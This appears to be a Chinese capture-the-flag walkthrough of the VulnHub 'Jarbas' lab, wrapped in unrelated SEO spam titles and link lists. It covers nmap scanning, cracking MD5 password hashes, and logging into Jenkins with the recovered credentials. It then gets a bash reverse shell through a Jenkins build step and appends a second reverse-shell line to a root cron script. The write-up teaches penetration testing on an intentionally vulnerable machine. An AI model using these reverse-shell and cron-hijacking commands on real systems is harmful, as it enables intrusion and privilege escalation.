当前位置: 首页 > news >正文

建立网站准备工作百度店铺免费入驻

建立网站准备工作,百度店铺免费入驻,商城网站营销系统源码,网页设计素材为什么拖不进ps文章目录 信息收集主机发现端口扫描目录爆破 漏洞探测whatwebhash-identifierwhatweb 文档说明:https://www.vulnhub.com/entry/jarbas-1,232/ 靶机下载:Download (Mirror): 信息收集 主机发现 扫描C段 sudo nmap -sn 10.9.75.0/24端口扫描 sudo nma…

文章目录

    • 信息收集
      • 主机发现
      • 端口扫描
      • 目录爆破
    • 漏洞探测
      • whatweb
      • hash-identifier
      • whatweb

文档说明:https://www.vulnhub.com/entry/jarbas-1,232/

靶机下载:Download (Mirror):

信息收集

主机发现

扫描C段

sudo nmap -sn 10.9.75.0/24

image-20231125131716854

端口扫描

sudo nmap --min-rate 10000 10.9.75.10

image-20231125131847664

详细扫描服务版本,系统

sudo nmap -sT -sV -O -p 22,80,3306,8080 10.9.75.10 

image-20231125132007149

目录爆破

dirsearch -u http://10.9.75.10 -i 200  

image-20231125132323184

漏洞探测

whatweb

访问80端口

image-20231125132425330

whatweb http://10.9.75.10

image-20231125133245051

并没有识别到类似的CMS内容管理系统,

继续访问access.html发现了类似用户名:加密后的密码的东西

image-20231125132945210

hash-identifier

可以使用工具来验证加密类型

hash-identifier "5978a63b4654c73c60fa24f836386d87"  

image-20231125133052923

拿去在线网站进行md5解密

image-20231125133516690

image-20231125133605822

image-20231125133636880

tiago:italia99

trindade:marianna

eder:vipsu

访问8080端口

image-20231125134737788

whatweb

whatweb http://10.9.75.10:8080

image-20231125134830353

指纹识别出一个Jenkins的CMS管理系统

尝试使用上面解密出来的密码进行登陆

使用eder:vipsu登陆成功!

image-20231125135041152

image-20231125135104467

新建一个任务

image-20231125135842524

选择第一个自由风格软件项目就可以,然后往下翻,点击确定

点击Build构建

image-20231125135948173

由于目标系统是linux系统,所以选择第二个execute shell

/bin/bash >& /dev/tcp/10.9.75.3/6868 0>&1#反弹到kali上

点击应用,然后点击保存

image-20231125140121483

这个时候kali先监听6868端口

nc  -lvvp 6868  

回到页面上点击立即构建

image-20231125140412821

就反弹到kali机器上了

image-20231125140529852

页面上会显示有一个任务正在运行

image-20231125140547563

我们拿到shell是没有回显的,可以通过python获取显示shell

python -c "import pty;pty.spawn('/bin/bash')"

image-20231125140911530

最后再计划任务里找到了以root运行 的程序

image-20231125141047389

查看文件内容

cat /etc/script/CleaningScript.sh

image-20231125141328159

可以在里面添加反弹shell,

echo "/bin/bash >& /dev/tcp/10.9.75.3/6869 0>&1" >> /etc/script/CleaningScript.sh

image-20231125141432284

kali监听6869端口,等待反弹

image-20231125141555084

Jenkins 的漏洞利用方式有很多,可以自行去网上查阅相关资料

http://www.khdw.cn/news/6662.html

相关文章:

  • 网站不备案可以做淘宝联盟吗游戏推广可以做吗
  • html免费网站模板下载搜索引擎优化缩写
  • 遵义市政府网站建设概况互联网营销主要学什么
  • 大良营销网站建设策划网站推广专家十年乐云seo
  • 做数学题的网站有吗seo门户网站优化
  • 长春火车站在哪seo快速排名软件品牌
  • 辽宁鲲鹏建设集团网站色盲怎么治疗
  • 自己做报名网站百度网盘app下载安装
  • 南宁两学一做网站百度一下百度知道
  • 网站建设概述网页设计模板html代码
  • 简单做网站的价格经典模板网站建设
  • 电子商务网站建设与维护读书报告地推怎么做最有效
  • 做网站登录的需求分析网络安全培训
  • dreamweaver网页设计与制作网站seo推广公司靠谱吗
  • 莱州网站建设关键字排名优化网络托管微信代运营百度站长之家工具
  • 深圳专业网站制作技术seo日常工作
  • 东莞做外贸网站google推广工具
  • 南宁 网站建设 制作网文推广怎么做
  • 在过没wordpress火吗怎样进行seo推广
  • wordpress主题学习青岛官网seo公司
  • 贵阳网站建设报价可以直接打开网站的网页
  • 香港做一楼一凤的网站合法吗成都百度推广
  • 哪里网站建设联系方式seo主要是指优化
  • 没有注册公司怎么做网站电脑培训网
  • 网页传奇私seo基础教程
  • 幼儿园学校网站建设作用网站查询平台官网
  • 简单flash网站模板什么是sem
  • wordpress 多站点模式站长工具域名查询
  • 网站怎么屏蔽ip访问口碑营销的好处
  • 制作个人网站的软件seo零基础教学